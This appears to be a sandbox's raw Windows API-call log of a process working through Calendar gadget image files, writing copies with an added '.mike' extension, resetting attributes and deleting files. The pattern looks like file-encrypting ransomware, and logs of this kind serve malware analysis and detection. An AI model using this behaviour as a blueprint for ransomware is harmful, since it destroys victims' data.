SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.408] WriteFile (in: hFile=0x284, lpBuffer=0x21656f8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21656f8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.409] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.411] WriteFile (in: hFile=0x284, lpBuffer=0x216a0b4*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x216a0b4*, lpNumberOfBytesWritten=0x2af074*=0x1a0, lpOverlapped=0x0) returned 1 [0131.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.413] WriteFile (in: hFile=0x284, lpBuffer=0x216d2fc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x216d2fc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.413] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.414] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.414] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", dwFileAttributes=0x80) returned 0 [0131.415] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", lpFilePart=0x0) returned 0x54 [0131.415] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.416] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.417] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x53 [0131.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.421] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.422] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x53 [0131.422] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.422] WriteFile (in: hFile=0x284, lpBuffer=0x2172770*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2172770*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.423] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.426] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.426] WriteFile (in: hFile=0x284, lpBuffer=0x21774e4*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21774e4*, lpNumberOfBytesWritten=0x2af074*=0x240, lpOverlapped=0x0) returned 1 [0131.427] WriteFile (in: hFile=0x284, lpBuffer=0x217a72c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x217a72c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.428] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.428] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", dwFileAttributes=0x80) returned 0 [0131.430] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x53 [0131.430] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.431] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.432] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x4f [0131.433] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.434] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x4f [0131.434] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x54 [0131.434] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x4f [0131.434] WriteFile (in: hFile=0x284, lpBuffer=0x217fa8c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x217fa8c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.436] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.437] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x54 [0131.437] WriteFile (in: hFile=0x284, lpBuffer=0x2183e20*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2183e20*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0131.439] WriteFile (in: hFile=0x284, lpBuffer=0x2187058*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2187058*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.439] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x54 [0131.440] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x54 [0131.440] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", dwFileAttributes=0x80) returned 0 [0131.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x4f [0131.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x54 [0131.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x54 [0131.442] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike")) returned 1 [0131.444] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.444] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x5e [0131.445] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x59 [0131.445] WriteFile (in: hFile=0x284, lpBuffer=0x218c580*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x218c580*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.446] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.448] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x5e [0131.449] WriteFile (in: hFile=0x284, lpBuffer=0x2193ae4*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2193ae4*, lpNumberOfBytesWritten=0x2af074*=0x8e0, lpOverlapped=0x0) returned 1 [0131.450] WriteFile (in: hFile=0x284, lpBuffer=0x2196d44*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2196d44*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.451] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x5e [0131.451] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x5e [0131.451] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", dwFileAttributes=0x80) returned 0 [0131.452] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x59 [0131.452] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x5e [0131.453] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x5e [0131.453] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x5d [0131.455] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.455] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x62 [0131.456] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x5d [0131.456] WriteFile (in: hFile=0x284, lpBuffer=0x219c4c4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x219c4c4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.457] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.459] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x62 [0131.459] WriteFile (in: hFile=0x284, lpBuffer=0x21a4be8*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21a4be8*, lpNumberOfBytesWritten=0x2af074*=0xbd0, lpOverlapped=0x0) returned 1 [0131.461] WriteFile (in: hFile=0x284, lpBuffer=0x21a7e58*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21a7e58*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.461] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x62 [0131.462] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x62 [0131.462] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", dwFileAttributes=0x80) returned 0 [0131.463] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x5d [0131.463] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x62 [0131.463] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x62 [0131.464] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.mike")) returned 1 [0131.466] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.467] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x65 [0131.467] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", lpFilePart=0x0) returned 0x60 [0131.467] WriteFile (in: hFile=0x284, lpBuffer=0x21ad73c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21ad73c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.468] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.470] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x65 [0131.471] WriteFile (in: hFile=0x284, lpBuffer=0x21b6ad8*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21b6ad8*, lpNumberOfBytesWritten=0x2af074*=0xde0, lpOverlapped=0x0) returned 1 